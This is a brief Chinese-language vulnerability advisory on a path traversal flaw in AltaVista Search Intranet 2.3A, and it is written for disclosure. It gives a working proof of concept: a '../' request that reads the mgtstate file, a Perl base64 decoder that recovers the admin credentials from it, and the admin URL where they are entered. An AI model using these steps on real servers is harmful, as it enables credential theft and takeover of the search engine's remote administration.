受影響系統:
AltaVista Search Intranet 2.3A
描述:
AltaVista Search engine在9000端口開啓了一個webserver,用來監聽搜索請求.主要的搜索
函數(cgi-bin/query)中有一個模板變量{mss},它將接受搜索請求中的包含的單個"../"字符
串,提供對上一層目錄('http')中所有文檔的訪問權限.
這些文檔可能包含很多管理信息,包括用來進行遠程管理的用戶名和口令.這些用戶名和口令
被base-64編碼,可以很容易得被恢復成純文本方式,因此攻擊者可以獲得遠程管理這個搜索引
擎的權力.
< 發現者: rudi carell ([email protected]) >
測試方法:
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
通過執行 http://target:9000/cgi-bin/query?../logs/mgtstate
可以獲得mgtstate文件的內容,這裏麪包含有遠程管理的用戶名和口令.
利用下面的小程序就可以將其解碼,得到用戶名和口令:
#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "\n";
然後執行 http://target:9000/cgi-bin/mgt
輸入得到的用戶名和口令就可以遠程管理該搜索引擎